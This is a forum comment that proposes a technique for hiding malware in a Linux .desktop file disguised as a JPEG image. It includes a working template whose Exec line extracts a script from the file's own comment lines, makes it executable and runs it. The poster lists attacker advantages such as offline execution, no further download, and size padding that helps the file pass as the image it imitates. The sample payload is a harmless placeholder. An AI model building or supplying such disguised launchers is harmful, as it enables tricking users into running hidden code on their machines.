Has anyone mentioned the possibility yet of embedding the payload (malicious script, etc.) within the
.desktop file? The specification allows for commenting, after all, which is a free way to embed text -- the question then merely becomes one of extracting the text from the "comments" at the tail end of a
.desktop file, outputting it to its own file, and executing.
To wit, in a file called blah.desktop:
[OMGMALICIOUS]
Version=1.0
Type=Application
Name=HOT XXX JENNA JAMESON.jpg
Icon=jpegicon.png
Exec=bash -c "tail -n +7 blah.desktop | sed -E 's/^#(.*)$/\1/g' > malscript; chmod 777 malscript; ./malscript"
##!/bin/bash
##
## OMG MALICIOUS
#
#echo OMG HI PWNED J00 > pwned
Which would then open the door to other types of scripts being embedded within the .desktop file, such as Python or Perl (the latter of which is probably the even more widespread of the two!)
This method has a few benefits over the described one, including: offline execution of malware, no further download beyond the .desktop required; semi-easy modification of the embedded script (you can add or remove lines as you wish and even leave comments in thanks to the tail and sed commands used); and the embedded file could easily make the .desktop file it's contained in reach file size levels (something I, personally, look at with certain files) roughly equivalent to the file it's attempting to masquerade as. Theoretically, so long as you remembered to escape things properly, you could possibly even include binaries within the .desktop file in this manner(!!!!).
This of course comes no closer to the holy grail that is root, but still an interesting twist on the same process...